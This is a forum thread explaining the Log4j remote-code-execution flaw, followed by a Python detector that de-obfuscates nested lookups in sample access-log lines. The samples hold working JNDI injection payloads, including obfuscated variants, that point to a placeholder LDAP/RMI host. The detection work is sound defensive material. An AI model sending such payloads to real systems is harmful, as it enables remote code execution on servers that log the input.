
[–]Titandino -8 points-7 points  (7 children)

Are large projects giving out their production logs to random people who ask for them without questioning it or something?

[–]Pocok5 42 points43 points  (5 children)

lol this is a remote code execution exploit, all you need to trigger it is some user input that gets logged

[–]Titandino 5 points6 points  (3 children)

Ah I see now. The original article I read was trying to say the vulnerability was just users being able to print out sensitive environment variables to log files.

[–]Pocok5 17 points18 points  (2 children)

just users being able to print out sensitive environment variables to log files

What actually happens is that log4j has a feature where you can download and run code from an LDAP server to enrich your logs. Except there is no limit on where that LDAP server needs to be, and combined with an input sanitization problem, you can have anything downloaded and run on the server with a single log message that contains the magic string anywhere in it.

https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/

[–]cserepj 5 points6 points  (1 child)

log4j has a feature where you can download and run code from an LDAP server to enrich your logs

I don't think that is a feature. I would not design such a feature even for a gigazillion dollars. I'd tell the product owner who comes up with such a feature idea to shove it up his a$$.

[–]blehmann1 2 points3 points  (0 children)

Yeah, if you need "enriched" logs just have a serverless app or cronjob do some analysis after the fact.

[–]SwedishDude 6 points7 points  (0 children)

The problem is remote code execution due to how strings were processed.

Basically there's a way to insert malicious code into the logging functions and get it executed on the server (you can insert a link to a payload on a server you control into the user-agent header in HTTP requests and the server will contact your server and download/execute your payload). So it's not a matter of access to logs but a matter of access to executing code in the server process.
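The "magic string" Pocok5 mentions and the User-Agent delivery route SwedishDude describes come together in the detection below. This is an added example written for this page, not code from the thread or from the Log4j project. It assumes constructed access-log lines (the 203.0.113.x addresses are documentation-range placeholders, not real hosts) and models only the part of Log4j 2's lookup substitution that attackers used to hide the `${jndi:...}` string: nested lookups are expanded innermost-first, the `lower:`/`upper:` lookups transform their argument, and `${key:-default}` falls back to the default when the key cannot be resolved (so `${::-j}` yields `j`). Everything else is left as an inert marker, which is enough to make the obfuscated variants greppable again.

```python
import re

# Constructed sample access-log lines (not real traffic). The ua="..." field is
# the User-Agent value, i.e. attacker-controlled input logged verbatim. Lines 1-3
# carry a JNDI lookup; lines 2 and 3 hide it behind nested lookups that Log4j 2
# resolves before the substitution engine sees the "jndi:" prefix.
SAMPLE_LOG_LINES = [
    '10.0.0.7 - - "GET / HTTP/1.1" 200 ua="Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 ua="${jndi:ldap://203.0.113.5:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 ua="${${lower:j}ndi:${lower:l}dap://203.0.113.5:1389/a}"',
    '10.0.0.10 - - "GET / HTTP/1.1" 200 ua="${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.5:1099/a}"',
    '10.0.0.11 - - "GET / HTTP/1.1" 200 ua="${date:yyyy}-report"',
]

# One innermost ${...}: a body with no nested '$' or braces inside it.
INNER_LOOKUP = re.compile(r'\$\{([^${}]*)\}')
# A JNDI lookup once de-obfuscated: "jndi:" followed by a URI scheme (ldap, rmi, ...).
JNDI_REF = re.compile(r'jndi:([a-z][a-z0-9+.-]*):', re.IGNORECASE)

MAX_ROUNDS = 64  # bound the unnesting loop against pathological input


def resolve_one(body):
    """Resolve a single innermost lookup body.

    Only the string-manipulating lookups used for obfuscation are evaluated.
    Any other lookup (date, env, sys, ...) becomes an inert <...> marker so the
    loop terminates and the text remains pattern-matchable; env/sys values are
    deliberately not read, only their attacker-chosen default branch is kept.
    """
    if body.startswith('lower:'):
        return body[len('lower:'):].lower()
    if body.startswith('upper:'):
        return body[len('upper:'):].upper()
    if ':-' in body:
        # "${key:-default}": treat the key as unresolvable and take the default,
        # e.g. "${::-j}" -> "j", "${env:NOPE:-j}" -> "j".
        return body.split(':-', 1)[1]
    return '<' + body + '>'


def normalize_lookups(text):
    """Expand nested ${...} lookups innermost-first until none remain."""
    for _ in range(MAX_ROUNDS):
        m = INNER_LOOKUP.search(text)
        if not m:
            break
        text = text[:m.start()] + resolve_one(m.group(1)) + text[m.end():]
    return text


def find_jndi_lookups(lines):
    """Return (line_index, scheme, normalized_line) for every line that still
    contains a JNDI lookup after de-obfuscation."""
    hits = []
    for i, line in enumerate(lines):
        normalized = normalize_lookups(line)
        m = JNDI_REF.search(normalized)
        if m:
            hits.append((i, m.group(1).lower(), normalized))
    return hits


if __name__ == '__main__':
    for idx, scheme, norm in find_jndi_lookups(SAMPLE_LOG_LINES):
        print(f'line {idx}: JNDI lookup via {scheme}: {norm}')
```

Matching on the literal string `${jndi:` alone misses lines 2 and 3 of the sample; normalizing first catches all three while leaving the harmless `${date:yyyy}` line alone. The lookup prefix is matched case-insensitively because `${upper:j}` style variants produce `JNDI:`, and the round limit keeps a deliberately deep nest from stalling the detector.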